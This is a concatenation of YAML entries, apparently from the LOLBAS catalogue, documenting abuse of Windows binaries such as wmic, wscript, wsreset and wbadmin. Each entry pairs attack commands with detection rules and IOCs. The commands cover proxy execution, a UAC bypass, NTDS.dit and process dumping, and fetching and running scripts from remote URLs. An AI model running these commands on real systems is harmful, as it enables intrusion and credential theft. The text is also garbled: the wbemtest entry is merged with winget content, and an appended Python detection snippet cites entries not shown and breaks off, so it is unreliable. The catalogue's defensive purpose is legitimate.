    Description: Extracts archive.tar from the remote (internal) host to the current host.
    Usecase: Copy files
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Type: Compression
Full_Path:
  - Path: C:\Windows\System32\tar.exe
  - Path: C:\Windows\SysWOW64\tar.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_compression.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/e1a713d264ac072bb76b5c4e5f41315a015d3f41/rules/windows/process_creation/proc_creation_win_tar_extraction.yml
  - IOC: tar.exe extracting files from a remote host within the environment
  - IOC: Abnormal processes spawning tar.exe
  - IOC: tar.exe interacting with alternate data streams (ADS)
Resources:
  - Link: https://twitter.com/Cyber_Sorcery/status/1619819249886969856
Acknowledgement:
  - Person: Brian Lucero
    Handle: '@Cyber_Sorcery'
  - Person: Avester Fahimipour

================================================
FILE: yml/OSBinaries/Ttdinject.yml
================================================
---
Name: Ttdinject.exe
Description: Used by Windows 1809 and newer for Time Travel Debugging (underlying call of tttracer.exe)
Author: Maxime Nadeau
Created: 2020-05-12
Commands:
  - Command: TTDInject.exe /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /Launch "{PATH:.exe}"
    Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file name can be changed, but the length field (7, the length of "tmp.run") has to be updated to match.
    Usecase: Spawn process using other binary
    Category: Execute
    Privileges: Administrator
    MitreID: T1127
    OperatingSystem: Windows 10 2004 and above, Windows 11
    Tags:
      - Execute: EXE
  - Command: ttdinject.exe /ClientScenario TTDRecorder /ddload 0 /ClientParams "7 tmp.run 0 0 0 0 0 0 0 0 0 0" /launch "{PATH:.exe}"
    Description: Execute a program using ttdinject.exe. Requires administrator privileges. A log file will be created in tmp.run. The log file name can be changed, but the length field (7, the length of "tmp.run") has to be updated to match.
    Usecase: Spawn process using other binary
    Category: Execute
    Privileges: Administrator
    MitreID: T1127
    OperatingSystem: Windows 10 1909 and below
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Windows\System32\ttdinject.exe
  - Path: C:\Windows\Syswow64\ttdinject.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/create_remote_thread/create_remote_thread_win_ttdinjec.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/7ea6ed3db65e0bd812b051d9bb4fffd27c4c4d0a/rules/windows/process_creation/proc_creation_win_lolbin_ttdinject.yml
  - IOC: Parent child relationship. Ttdinject.exe parent for executed command
  - IOC: Multiple queries made to the IFEO registry key of an untrusted executable (Ex. "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\payload.exe") from the ttdinject.exe process
Resources:
  - Link: https://twitter.com/Oddvarmoe/status/1196333160470138880
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
  - Person: Maxime Nadeau
    Handle: '@m_nad0'

================================================
FILE: yml/OSBinaries/Tttracer.yml
================================================
---
Name: Tttracer.exe
Description: Used by Windows 1809 and newer for Time Travel Debugging
Author: Oddvar Moe
Created: 2019-11-05
Commands:
  - Command: tttracer.exe {PATH_ABSOLUTE:.exe}
    Description: Execute specified executable from tttracer.exe. Requires administrator privileges.
    Usecase: Spawn process using other binary
    Category: Execute
    Privileges: Administrator
    MitreID: T1127
    OperatingSystem: Windows 10 1809 and newer, Windows 11
    Tags:
      - Execute: EXE
  - Command: TTTracer.exe -dumpFull -attach {PID}
    Description: Dumps process using tttracer.exe. Requires administrator privileges
    Usecase: Dump process by PID
    Category: Dump
    Privileges: Administrator
    MitreID: T1003
    OperatingSystem: Windows 10 1809 and newer, Windows 11
Full_Path:
  - Path: C:\Windows\System32\tttracer.exe
  - Path: C:\Windows\SysWOW64\tttracer.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_tttracer_mod_load.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
  - IOC: Parent child relationship. Tttracer parent for executed command
Resources:
  - Link: https://twitter.com/oulusoyum/status/1191329746069655553
  - Link: https://twitter.com/mattifestation/status/1196390321783025666
  - Link: https://lists.samba.org/archive/cifs-protocol/2016-April/002877.html
Acknowledgement:
  - Person: Onur Ulusoy
    Handle: '@oulusoyum'
  - Person: Matt Graeber
    Handle: '@mattifestation'

================================================
FILE: yml/OSBinaries/Unregmp2.yml
================================================
---
Name: Unregmp2.exe
Description: Microsoft Windows Media Player Setup Utility
Author: Wade Hickey
Created: 2021-12-06
Commands:
  - Command: rmdir %temp%\lolbin /s /q 2>nul & mkdir "%temp%\lolbin\Windows Media Player" & copy C:\Windows\System32\calc.exe "%temp%\lolbin\Windows Media Player\wmpnscfg.exe" >nul && cmd /V /C "set "ProgramW6432=%temp%\lolbin" && unregmp2.exe /HideWMP"
    Description: Allows an attacker to copy a target binary to a controlled directory and point the 'ProgramW6432' environment variable at that directory, then execute 'unregmp2.exe' with the argument '/HideWMP', which spawns a process from the hijacked path '%ProgramW6432%\Windows Media Player\wmpnscfg.exe' (the location the command above plants the renamed binary in).
    Usecase: Proxy execution of binary
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Windows\System32\unregmp2.exe
  - Path: C:\Windows\SysWOW64\unregmp2.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/197615345b927682ab7ad7fa3c5f5bb2ed911eed/rules/windows/process_creation/proc_creation_win_lolbin_unregmp2.yml
  - IOC: Low-prevalence binaries, with filename 'wmpnscfg.exe', spawned as child-processes of `unregmp2.exe /HideWMP`
Resources:
  - Link: https://twitter.com/notwhickey/status/1466588365336293385
Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'

================================================
FILE: yml/OSBinaries/Vbc.yml
================================================
---
Name: vbc.exe
Description: Binary used to compile Visual Basic (.NET) code
Author: Lior Adar
Created: 2020-02-27
Commands:
  - Command: vbc.exe /target:exe {PATH_ABSOLUTE:.vb}
    Description: Binary file used by .NET to compile Visual Basic code to an executable.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 7, Windows 10, Windows 11
  - Command: vbc -reference:Microsoft.VisualBasic.dll {PATH_ABSOLUTE:.vb}
    Description: Binary file used by .NET to compile Visual Basic code to an executable.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 7, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v3.5\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\vbc.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
Acknowledgement:
  - Person: Lior Adar
  - Person: Hai Vaknin(Lux)

================================================
FILE: yml/OSBinaries/Verclsid.yml
================================================
---
Name: Verclsid.exe
Description: Used to verify a COM object before it is instantiated by Windows Explorer
Author: '@bohops'
Created: 2018-12-04
Commands:
  - Command: verclsid.exe /S /C {CLSID}
    Description: Used to verify a COM object before it is instantiated by Windows Explorer
    Usecase: Run a COM object created in registry to evade defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1218.012
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: COM
Full_Path:
  - Path: C:\Windows\System32\verclsid.exe
  - Path: C:\Windows\SysWOW64\verclsid.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml
  - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml
Resources:
  - Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
  - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
Acknowledgement:
  - Person: Nick Tyrer
    Handle: '@NickTyrer'

================================================
FILE: yml/OSBinaries/Wab.yml
================================================
---
Name: Wab.exe
Description: Windows address book manager
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: wab.exe
    Description: Change HKLM\Software\Microsoft\WAB\DLLPath and execute DLL of choice
    Usecase: Execute dll file. Bypass defensive counter measures
    Category: Execute
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Program Files\Windows Mail\wab.exe
  - Path: C:\Program Files (x86)\Windows Mail\wab.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml
  - IOC: WAB.exe should normally never be used
Resources:
  - Link: https://twitter.com/Hexacorn/status/991447379864932352
  - Link: http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
Acknowledgement:
  - Person: Adam
    Handle: '@Hexacorn'

================================================
FILE: yml/OSBinaries/Wbadmin.yml
================================================
---
Name: wbadmin.exe
Description: Windows Backup Administration utility
Author: Chris Eastwood
Created: 2024-04-05
Commands:
  - Command: wbadmin start backup -backupTarget:{PATH_ABSOLUTE:folder} -include:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -quiet
    Description: Extract NTDS.dit and SYSTEM hive into a backup virtual hard drive file (.vhdx)
    Usecase: Snapshotting of Active Directory NTDS.dit database
    Category: Dump
    Privileges: Administrator, Backup Operators, SeBackupPrivilege
    MitreID: T1003.003
    OperatingSystem: Windows Server
  - Command: wbadmin start recovery -version: -recoverytarget:{PATH_ABSOLUTE:folder} -itemtype:file -items:C:\Windows\NTDS\NTDS.dit,C:\Windows\System32\config\SYSTEM -notRestoreAcl -quiet
    Description: Restore a version of NTDS.dit and SYSTEM hive into a file path. The command `wbadmin get versions` can be used to find version identifiers.
    Usecase: Dumping of Active Directory NTDS.dit database
    Category: Dump
    Privileges: Administrator, Backup Operators, SeBackupPrivilege
    MitreID: T1003.003
    OperatingSystem: Windows Server
Full_Path:
  - Path: C:\Windows\System32\wbadmin.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_dump_sensitive_files.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_file.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c7998c92b3c5f23ea67045bee8ee364d2ed1a775/rules/windows/process_creation/proc_creation_win_wbadmin_restore_sensitive_files.yml
  - IOC: wbadmin.exe command lines containing "NTDS" or "NTDS.dit"
Resources:
  - Link: https://medium.com/r3d-buck3t/windows-privesc-with-sebackupprivilege-65d2cd1eb960

================================================
FILE: yml/OSBinaries/Wbemtest.yml
================================================
---
Name: wbemtest.exe
Description: WMI/WBEM Test Binary
Author: saulpanders
Created: 2025-04-22
Commands:
  - Command: wbemtest.exe
    Description: Execute arbitrary commands through WMI via a GUI management interface intended for Web-Based Enterprise Management (WBEM) testing. Uses WMI to create an instance of the Win32_Process class with a CommandLine argument of the target command to spawn. Spawns a GUI, so it requires interactive access. For a demo, see the blog link in Resources.
    Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
  - Command: winget.exe install --accept-package-agreements -s msstore {name or ID}
    Description: 'Download and install any software from the Microsoft Store using its name or Store ID, even if the Microsoft Store App itself is blocked on the machine, and even if AppLocker is active on the machine. For example, use "Sysinternals Suite" or `9p7knl5rwt25` to obtain ProcDump and PsExec via the Sysinternals Suite. Note: a Microsoft account is required for this.'
    Usecase: Download and install software from Microsoft Store, even if Microsoft Store App is blocked, and AppLocker is activated on the machine
    Category: AWL Bypass
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Users\user\AppData\Local\Microsoft\WindowsApps\winget.exe
Code_Sample:
  - Code: https://gist.github.com/saulpanders/00e1177602a8c01a3a8bfa932b3886b0
Detection:
  - IOC: winget.exe spawned with local manifest file
  - IOC: Sysmon Event ID 1 - Process Creation
  - Analysis: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_winget_local_install_via_manifest.yml
Resources:
  - Link: https://saulpanders.github.io/2022/01/02/New-Year-New-LOLBAS.html
  - Link: https://docs.microsoft.com/en-us/windows/package-manager/winget/#production-recommended
  - Link: https://www.youtube.com/watch?v=zuL7x4Wltto
Acknowledgement:
  - Person: Paul
    Handle: '@saulpanders'
  - Person: Konrad 'unrooted' Klawikowski
  - Person: Fredrik H. Brathen

================================================
FILE: yml/OSBinaries/Wlrmdr.yml
================================================
---
Name: Wlrmdr.exe
Description: Windows Logon Reminder executable
Author: Moshe Kaplan
Created: 2022-02-16
Commands:
  - Command: "wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u {PATH:.exe}"
    Description: Execute executable with wlrmdr.exe as parent process
    Usecase: Use wlrmdr as a proxy binary to evade defensive countermeasures
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: c:\windows\system32\wlrmdr.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wlrmdr.yml
  - IOC: wlrmdr.exe spawning any new processes
Resources:
  - Link: https://twitter.com/0gtweet/status/1493963591745220608
  - Link: https://twitter.com/Oddvarmoe/status/927437787242090496
  - Link: https://twitter.com/falsneg/status/1461625526640992260
  - Link: https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw
Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'
  - Person: Oddvar Moe
    Handle: '@Oddvarmoe'
  - Person: Freddy
    Handle: '@falsneg'

================================================
FILE: yml/OSBinaries/Wmic.yml
================================================
---
Name: Wmic.exe
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: wmic.exe process call create "{PATH_ABSOLUTE}:program.exe"
    Description: Execute a .EXE file stored as an Alternate Data Stream (ADS)
    Usecase: Execute binary file hidden in Alternate data streams to evade defensive counter measures
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: wmic.exe process call create "{CMD}"
    Description: Execute the specified command (for example calc) from wmic
    Usecase: Execute binary from wmic to evade defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: wmic.exe /node:"192.168.0.1" process call create "{CMD}"
    Description: Execute the specified command on the remote system.
    Usecase: Execute binary on a remote system
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
      - Execute: Remote
  - Command: wmic.exe process get brief /format:"{REMOTEURL:.xsl}"
    Description: Executes JScript or VBScript embedded in the XSL stylesheet fetched from the remote URL.
    Usecase: Execute script from a remote URL
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: XSL
      - Execute: Remote
  - Command: wmic.exe process get brief /format:"{PATH_SMB:.xsl}"
    Description: Executes JScript or VBScript embedded in the target remote XSL stylesheet.
    Usecase: Execute script from remote system
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: XSL
      - Execute: Remote
  - Command: wmic.exe datafile where "Name='C:\\windows\\system32\\calc.exe'" call Copy "C:\\users\\public\\calc.exe"
    Description: Copy file from source to destination.
    Usecase: Copy file.
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\wbem\wmic.exe
  - Path: C:\Windows\SysWOW64\wbem\wmic.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_squiblytwo_bypass.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wmic_eventconsumer_creation.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
  - Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml
  - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml
  - Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml
  - Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Wmic retrieving scripts from remote system/Internet location
  - IOC: DotNet CLR libraries loaded into wmic.exe
  - IOC: DotNet CLR Usage Log - wmic.exe.log
  - IOC: wmiprvse.exe writing files
Resources:
  - Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
  - Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
  - Link: https://twitter.com/subTee/status/986234811944648707
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OSBinaries/WorkFolders.yml
================================================
---
Name: WorkFolders.exe
Description: Work Folders
Author: Elliot Killick
Created: 2021-08-16
Commands:
  - Command: WorkFolders
    Description: Execute `control.exe` in the current working directory
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Requires: Rename
  - Command: WorkFolders
    Description: '`WorkFolders` attempts to execute `control.exe`. By modifying the default value of the App Paths registry key for `control.exe` in `HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe`, an attacker can achieve proxy execution.'
    Usecase: Proxy execution of a malicious payload via App Paths registry hijacking.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Requires: Registry change
Full_Path:
  - Path: C:\Windows\System32\WorkFolders.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml
  - IOC: WorkFolders.exe should not be run on a normal workstation
  - IOC: Registry modification to HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\control.exe
Resources:
  - Link: https://www.ctus.io/2021/04/12/exploading/
  - Link: https://twitter.com/ElliotKillick/status/1449812843772227588
Acknowledgement:
  - Person: John Carroll
    Handle: '@YoSignals'
  - Person: Elliot Killick
    Handle: '@elliotkillick'
  - Person: Naor Evgi
    Handle: '@ghosts621'

================================================
FILE: yml/OSBinaries/Wscript.yml
================================================
---
Name: Wscript.exe
Description: Used by Windows to execute scripts
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: wscript //e:vbscript {PATH}:script.vbs
    Description: Execute script stored in an alternate data stream
    Usecase: Execute hidden code to evade defensive counter measures
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: WSH
  - Command: echo GetObject("script:{REMOTEURL:.js}") > {PATH_ABSOLUTE}:hi.js && wscript.exe {PATH_ABSOLUTE}:hi.js
    Description: Download and execute script stored in an alternate data stream
    Usecase: Execute hidden code to evade defensive counter measures
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\wscript.exe
  - Path: C:\Windows\SysWOW64\wscript.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_wscript_cscript_script_exec.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
  - Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Wscript.exe executing code from alternate data streams
  - IOC: DotNet CLR libraries loaded into wscript.exe
  - IOC: DotNet CLR Usage Log - wscript.exe.log
Resources:
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
  - Person: SaiLay(valen)
    Handle: '@404death'

================================================
FILE: yml/OSBinaries/Wsreset.yml
================================================
---
Name: Wsreset.exe
Description: Used to reset Windows Store settings according to its manifest file
Author: Oddvar Moe
Created: 2019-03-18
Commands:
  - Command: wsreset.exe
    Description: During startup, wsreset.exe checks the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command for the command to run. The binary will be executed as a high-integrity process without a UAC prompt being displayed to the user.
    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
    Category: UAC Bypass
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\wsreset.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml
  - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/wsreset_uac_bypass.yml
  - IOC: wsreset.exe launching child process other than mmc.exe
  - IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command
  - IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen
Resources:
  - Link: https://www.activecyber.us/activelabs/windows-uac-bypass
  - Link: https://twitter.com/ihack4falafel/status/1106644790114947073
  - Link: https://github.com/hfiref0x/UACME/blob/master/README.md
Acknowledgement:
  - Person: Hashim Jawad
    Handle: '@ihack4falafel'

================================================
FILE: yml/OSBinaries/Wuauclt.yml
================================================
---
Name: wuauclt.exe
Description: Windows Update Client
Author: David Middlehurst
Created: 2020-09-23
Commands:
  - Command: wuauclt.exe /UpdateDeploymentProvider {PATH_ABSOLUTE:.dll} /RunHandlerComServer
    Description: Loads and executes DLL code on attach.
    Usecase: Execute dll via attach/detach methods
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 10
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Windows\System32\wuauclt.exe
  - Path: C:\Windows\UUS\amd64\wuauclt.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_wuauclt.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_wuauclt_execution.yml
  - IOC: wuauclt run with a parameter of a DLL path
  - IOC: Suspicious wuauclt Internet/network connections
Resources:
  - Link: https://dtm.uk/wuauclt/
Acknowledgement:
  - Person: David Middlehurst
    Handle: '@dtmsecurity'

================================================
FILE: yml/OSBinaries/Xwizard.yml
================================================
---
Name: Xwizard.exe
Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: xwizard RunWizard {00000001-0000-0000-0000-0000FEEDACDC}
    Description: Xwizard.exe running a custom class that has been added to the registry.
    Usecase: Run a com object created in registry to evade defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: COM
  - Command: xwizard RunWizard /taero /u {00000001-0000-0000-0000-0000FEEDACDC}
    Description: Xwizard.exe running a custom class that has been added to the registry. The /t and /u switches prevent an error message in later Windows 10 builds.
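The process-creation IOCs listed in the Stordiag, Unregmp2 and WorkFolders entries (a well-known binary name running from an unexpected directory, or any child of the proxying parent) and in the Tar, Wmic and Wscript entries (an alternate data stream or a remote XSL stylesheet on the command line) can be checked with one small rule pass over Sysmon Event ID 1 records. The following is an added example, not code from the LOLBAS project or from any of the entry authors. Field names follow Sysmon (Image, ParentImage, CommandLine); the expected-directory table, the rule names and the sample events are assumptions constructed for this example.

```python
"""Added example (not LOLBAS project code): rule pass over Sysmon-style
process-creation events for the IOCs in the Stordiag, Unregmp2, WorkFolders,
Tar, Wmic and Wscript entries.  Paths, rule names and sample events are
constructed for the example."""
import ntpath
import re

# Binaries the entries name as proxy-execution or hijack targets, mapped to the
# directories they legitimately run from (lower case, no trailing backslash).
EXPECTED_DIRS = {
    "systeminfo.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "fltmc.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
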